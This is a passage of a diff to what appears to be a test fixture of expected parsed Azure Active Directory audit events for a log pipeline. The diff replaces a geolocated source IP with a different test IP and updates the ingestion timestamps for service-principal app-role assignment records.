"Value\":\"R5\"}],\"Id\":\"d8a2ae24-a752-4f8e-adca-c57189a76a71\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -1809,25 +1647,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -1841,7 +1661,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -1977,7 +1797,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -1989,12 +1809,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036118300Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124879300Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"N
ame\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryse
rvice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -2020,25 +1840,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -2052,7 +1854,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -2188,7 +1990,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -2200,12 +2002,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036124900Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124885800Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 